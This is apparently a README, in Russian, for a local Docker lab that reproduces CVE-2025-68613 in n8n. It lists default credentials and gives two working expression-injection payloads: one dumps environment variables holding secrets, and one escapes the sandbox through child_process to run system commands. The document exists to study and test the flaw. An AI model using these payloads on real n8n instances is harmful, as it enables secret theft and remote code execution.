
Анализ уязвимости CVE-2025-68613
Этот репозиторий предоставляет простую конфигурацию Docker Compose, которая запускает уязвимый экземпляр n8n для локального тестирования CVE-2025-68613.
Запустите контейнер:
docker compose up -d
Откройте n8n в вашем браузере:
Войдите, используя учётные данные по умолчанию, заданные в docker-compose.yml:
adminpassworddocker compose down
Это окружение предназначено только для локального изолированного тестирования. Не открывайте этот экземпляр в публичный интернет или любую недоверенную сеть. Держите его в частном локальном сегменте сети отдельно от производственных систем. Используйте на свой страх и риск.
Когда контейнер запущен, вы можете получить доступ к интерфейсу n8n по адресу http://localhost:5678. Чтобы проверить уязвимость, внедрите вредоносную полезную нагрузку JavaScript в поле выражения.
Шаги для воспроизведения:
Тест 1: Эксфильтрация переменных окружения. Эта полезная нагрузка пытается получить доступ к переменным окружения процесса, которые часто содержат секреты.
{{ (function() { return this.process.env; })() }}

Тест 2: Удалённое выполнение кода (RCE). Эта полезная нагрузка пытается загрузить модуль child_process для выполнения системных команд (например, whoami).
{{ (function() {
var require = this.process.mainModule.require;
var execSync = require('child_process').execSync;
return execSync('whoami').toString();
})() }}

Ожидаемый результат: Если среда уязвима, панель «Output» узла Set отобразит результат выполнения команды (например, root или пользователь n8n) или JSON-объект с переменными окружения. Если бы экземпляр был пропатчен (например, версия 1.122.0+), песочница вернула бы пустой объект или ошибку.